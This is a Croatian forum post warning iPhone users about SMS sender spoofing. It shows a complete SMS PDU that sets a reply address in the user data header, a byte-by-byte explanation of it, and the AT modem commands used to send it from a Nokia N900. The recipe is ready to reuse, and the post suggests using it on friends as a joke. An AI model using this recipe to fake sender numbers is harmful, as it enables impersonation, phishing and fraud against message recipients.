Siguran sam da ste posljednjih dana naisli na clanke slicne ovome:
http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html
Buduci da mnogi moji poznanici posjeduju iPhone, a cujem i mnogi ministri, osjecao sam potrebu ponovo naglasiti: Ne vjeruj SMS porukama!
Iako je ovo vec mnogima poznato, o cemu se radi? Ukratko, ako u UDH (user data header) ubacimo neku reply adresu (broj), iPhone ce prikazati reply broj kao izvorisnu adresu. Jednostavno receno, prilikom prikaza SMS-a iPhone nece prikazati izvorni broj, vec onaj broj koji je naveden kao reply adresa. Npr. pogledajmo ovako sastavljen PDU:
069183950104F141000C918395111111110000190A22080C958395212222224A43D16F771934AD0E9753
Pojednostavljeno znacenje:
06 - duljina SMSC informacije
91 - tip SMSC adrese
83950104F1 - SMSC broj
41 - tip poruke-SMS SUBMIT, User data header-PRESENT
00 - reference number
0C - duljina broja (12)
91 - tip broja (internacionalni zapis)
839511111111 - broj odredista (naravno, izmjeni se po potrebi)
00 - TP-PID
00 - TP-DCS
19 - User data length
0A - Use data header length (10 okteta)
22 - Reply Address Element
08 - Bytes Information Element, 0x08 (8 bajtova)
0C - Duljina reply broja
95 - tip broja
839521222222 - reply broj
4A43D16F7... - poruka
Koristeci GSM modem (ili u mom slucaju Nokiu n900) moguce je poslati sms u ovakvom obliku.
Nokia-N900:~# pnatd
at
OK
at+cmgf=0
OK
at+cmgs=35
> 069183950104F141000C918395111111110000190A22080C958395212222224A43D16F771934AD0E9753
+CMGS: 179
OK
Ako pokusate poslati ovakav "sirovi" PDU (uz uvjet da izmjenite odredisni broj), na svome iPhoneu dobit cete poruku koja izgleda kao da je stigla sa broja 385912222222 a glasi: iPhone SUCKS
Kao pomoc pri kreiranju "sirovih" poruka mozete koristiti javno dostupan alat: PDUspy
Poanta teksta nije dizati paranoju i "Idemo sad svi lazirati SMS poruke", vec osvjestiti korisnike iPhone-a i eventualno se malo nasaliti sa prijateljima :)
Pozdrav svim BUG forumasima
